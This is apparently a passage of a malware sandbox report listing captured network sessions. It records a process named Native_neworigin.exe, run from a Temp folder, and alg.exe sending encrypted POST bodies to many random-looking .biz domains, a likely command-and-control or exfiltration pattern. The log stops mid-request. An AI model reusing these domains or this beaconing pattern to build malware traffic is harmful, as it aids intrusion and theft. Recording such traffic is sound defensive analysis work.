                                                                                                                                                                                                                                                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    71192.168.2.105005218.141.10.107806072C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:13.769371986 CET353OUTPOST /ljnnvokac HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: acwjcqqv.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:13.769371986 CET778OUTData Raw: 68 df c4 ed da 05 1b c8 fe 02 00 00 c8 b1 f4 81 8a 59 9a 5c d1 13 b5 b7 3b 34 db 87 f6 9e e4 e2 55 2c 05 7c 33 0c 30 6e 87 f9 4d 57 07 a1 35 b3 c4 fb 3f cc fd 8a 34 15 90 0d d9 2a b3 84 ba b3 16 ae 63 8d 6f ba ac dc 55 ca 19 6c ef 08 dc 2a a4 33
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: hY\;4U,|30nMW5?4*coUl*3fkIa&g[T9M|VV0U_!C<5?qarU^18Y;=^y)/?BFE !iyogs:lkTYyO}L3UqhX6<$G!<
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:15.889539957 CET410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:15:15 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=2a54b335a2ebbf1f7b7d63346df2b9c1|8.46.123.75|1732605315|1732605315|0|1|0; path=/; domain=.acwjcqqv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    72192.168.2.105005334.211.97.45807892C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:14.185718060 CET342OUTPOST /y HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: jpskm.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:14.185745001 CET834OUTData Raw: c0 c5 d5 b9 80 c1 6e 89 36 03 00 00 e0 08 54 15 01 99 f8 a2 c7 17 70 c9 59 f8 38 97 b4 8a f5 48 4e 0c c2 76 6d 40 2c c0 4b 26 5b 06 44 0a dc 92 dc 46 b7 4e ed cd 3c 74 fa c5 36 2a a9 ae 07 25 00 6d 8e c3 e8 e0 79 d7 7b 4c 2d 03 3c aa fd 7b 9b 04
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: n6TpY8HNvm@,K&[DFN<t6*%my{L-<{/*9,R8+gLUEu)LVei u/O5mf*hEYV&0FtiY~#H"p/e?abnGLEi)G]]AS*T$
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:15.635694981 CET407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:15:15 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=7147dbe73fab5f9d7b2d371fc3822331|8.46.123.75|1732605315|1732605315|0|1|0; path=/; domain=.jpskm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    73192.168.2.105005454.244.188.177807892C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:15.932621956 CET356OUTPOST /heowijklptfa HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: lrxdmhrr.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:15.932656050 CET834OUTData Raw: 2b 88 f2 e0 82 8d 0a 67 36 03 00 00 34 ae bf a5 fb c3 b4 8e 21 00 2f 6b fb 50 69 93 d6 e0 83 e3 2d 91 07 11 1f dd e2 3e 9d a8 22 24 14 3c 6e 2d cb bc cc 03 09 01 c5 65 96 de 04 9e 03 63 dc f0 c4 e3 74 a6 8e ef 47 2f 63 be bd b9 79 04 ee 0e 79 ad
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: +g64!/kPi->"$<n-ectG/cyyp~B=pZ4c* Bb",MpGImJ"&<\RjV3t{'fBpbV+d+5QgoH0Y}E)9*Hy-TxrjhI`WRn*/
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:17.286962032 CET410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:15:17 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=4ae1d96ed42d4adedde3202a043fd38c|8.46.123.75|1732605317|1732605317|0|1|0; path=/; domain=.lrxdmhrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    74192.168.2.105005518.246.231.120806072C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:16.689461946 CET343OUTPOST /jt HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: vyome.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:16.689579010 CET778OUTData Raw: f1 8c 13 6a d3 bd 44 cc fe 02 00 00 06 0c 7f 35 2a e3 9d f2 75 0b 0a 1a ef e8 af 61 7b 8e 3f e1 50 92 b0 20 32 39 85 c1 36 72 c3 e4 ad d8 b4 a1 18 ab ec d3 bf 65 c3 e2 22 3a 84 e5 ef 41 f1 f8 45 d8 d6 27 92 b0 89 9a 07 93 0b db a9 77 3d cd 45 34
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: jD5*ua{?P 296re":AE'w=E4uP[^]>YIq%B1 ;P23,?GEF>d1aYs}nG}_pEJ E:-5Q}"x6Dv1byj{%,Vrd1
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:18.147669077 CET407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:15:17 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=eb73988ade21598fcf6481e1ea9a4133|8.46.123.75|1732605317|1732605317|0|1|0; path=/; domain=.vyome.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    75192.168.2.105005618.141.10.107807892C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:17.571510077 CET357OUTPOST /gerofbpnhxbnel HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: wllvnzb.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:17.571510077 CET834OUTData Raw: cc 7c 45 4c 46 9b 7d 24 36 03 00 00 59 08 f4 ce e8 2c f3 75 88 54 e6 d0 f3 23 58 c2 3e d3 f5 1d f3 68 de db 3b 66 f3 7c 8f be e9 6e 03 cd d7 13 26 68 49 4d 8c 10 31 c1 01 18 d4 fa 50 8c 08 2e 6d 42 e9 44 6c fc c4 9c 4c 1b a8 a9 8a 16 ab 48 aa 48
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: |ELF}$6Y,uT#X>h;f|n&hIM1P.mBDlLHHYfOSP%l}rjAq)L5yQv`<Ppw!2xmt4X@TPsr<R9v.3~rgGZuRL7z3Ko(
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:19.601514101 CET409INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:15:19 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=06110f42e336fce04bbbbd6b19650873|8.46.123.75|1732605319|1732605319|0|1|0; path=/; domain=.wllvnzb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    76192.168.2.105005718.208.156.248806072C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:19.221976042 CET354OUTPOST /negfyndqat HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: yauexmxk.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:19.222016096 CET778OUTData Raw: 21 28 7c 37 12 d2 4b a1 fe 02 00 00 4b 73 a3 53 5a 66 da d4 5d 6b ec 2a 6e ef d0 61 cc c2 46 bb f9 74 b2 c1 d8 2e 40 19 bf 2f 65 86 0f d9 2e 7f a1 22 b0 f4 0c b6 1c a1 e2 3e 20 32 72 11 11 2e 72 53 46 85 2c ff 3c 37 73 b0 99 e7 5f c4 40 0f 6b 21
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: !(|7KKsSZf]k*naFt.@/e."> 2r.rSF,<7s_@k!^Yc,A0Y7qewPO)Mc@dM}b9LXFbT{12~y~sy`-Vc:#{7D5|EA}`<P
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:20.118881941 CET410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:15:19 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=1a443072cabe0f0acf77edff343dfd23|8.46.123.75|1732605319|1732605319|0|1|0; path=/; domain=.yauexmxk.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    77192.168.2.105005818.208.156.248807892C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:19.906286001 CET344OUTPOST /twv HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: gnqgo.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:19.906322002 CET834OUTData Raw: c2 1d 19 ee 3d 56 ab be 36 03 00 00 77 dc 5b c5 7f b8 ba 3c 1b a8 3c 31 a4 7d 43 d1 76 de e8 14 11 12 cf ca dd fd 6e d3 8f 5c 68 33 22 15 bf b0 b2 12 e6 d2 b8 1c 0f a5 d7 83 d7 e7 3d f6 74 e2 b6 bc 1a a3 17 b7 08 ae 00 90 79 4e a6 be 61 07 17 27
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: =V6w[<<1}Cvn\h3"=tyNa'mRI$DaI rP7j.Ot%PnSq[jyuCNLOb?$R.5[+ \Lam3ozhO#ZjKO`u'9(><h'"xl\ou
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:21.105107069 CET407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:15:20 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=315ffeba306d84b91b29f8bba38dbcda|8.46.123.75|1732605320|1732605320|0|1|0; path=/; domain=.gnqgo.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    78192.168.2.105005913.251.16.150806072C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:20.857287884 CET351OUTPOST /sfduvqthq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: iuzpxe.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:20.857287884 CET778OUTData Raw: 58 3d f3 0f b4 c8 b1 fb fe 02 00 00 c1 9d 90 53 e6 b6 0e 22 26 7f 70 5c 06 0d 00 09 8b be 0c 9d 21 0e 23 a1 d4 89 49 6b ba 75 63 7d 46 6b 29 b3 da c4 1e 97 8e ee f9 b2 3d 20 f0 8e 27 91 fd 41 e4 20 90 27 1b 06 12 73 2c 2d 17 b4 10 18 39 ac bf b8
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: X=S"&p\!#Ikuc}Fk)= 'A 's,-9L[>F%#@"V{nG&U#D1 M2p)nH3IE_2TrY?xKoUgLabdE\Dsn]!z|x-47aQh:O9&
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:22.891587019 CET408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:15:22 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=b2d3e60ada42c8d3ac403ef05e4e3093|8.46.123.75|1732605322|1732605322|0|1|0; path=/; domain=.iuzpxe.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    79192.168.2.105006044.221.84.105807892C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:21.459054947 CET354OUTPOST /oitokksbsu HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: jhvzpcfg.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:21.459054947 CET834OUTData Raw: 74 32 a5 f6 f7 46 d0 7f 36 03 00 00 b1 7c 82 bd 8d 41 2f a3 4b 5d 7c d8 f9 3d 96 c5 ce b5 02 6b 55 d1 c9 22 3c 9f 40 f6 bb 9e 32 70 4c 4e e3 7d 95 5e 8a 7a b8 b7 58 5d 57 ef f2 30 e8 df 51 95 ea b2 5c 40 cd 0e 96 9d 96 de 3b 67 13 0d 06 99 c6 0f
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: t2F6|A/K]|=kU"<@2pLN}^zX]W0Q\@;g|+6Ff&d^L`l=#%'u+r0jP=WOM'}yGWtqz+Cl$_*L,9rZy#r32
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:22.559572935 CET410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:15:22 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=2c4dc3978bf3f37e10111479881a7871|8.46.123.75|1732605322|1732605322|0|1|0; path=/; domain=.jhvzpcfg.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    80192.168.2.105006118.141.10.107807892C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:22.828190088 CET347OUTPOST /rmu HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: acwjcqqv.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:22.828241110 CET834OUTData Raw: c2 78 36 4a 57 c5 6b 99 36 03 00 00 2d 78 74 77 ce 12 7d f2 f1 f0 be d4 49 e7 89 6f b2 a6 bf c2 43 3c c3 24 5d 78 8b 48 e6 39 70 a6 b4 11 a9 ed 91 fe 70 ca 55 b9 e7 d6 e0 3f 9b a1 c9 8b 27 eb 0a 0e ee ad 1f 16 6a 48 b4 66 11 97 01 5c 15 96 00 ff
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: x6JWk6-xtw}IoC<$]xH9ppU?'jHf\"8P?"B,xA+[:8iX'QTZ#v@~vY#q_14Z&|+m/g.$zmvQN>K;:C!bar$#|~"i_>(Cwm"r005
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:24.947565079 CET410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:15:24 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=7b7769fc83cd01dcf9b0e4f4df3a3812|8.46.123.75|1732605324|1732605324|0|1|0; path=/; domain=.acwjcqqv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    81192.168.2.105006213.251.16.150806072C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:23.585863113 CET353OUTPOST /ajqmmfcm HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
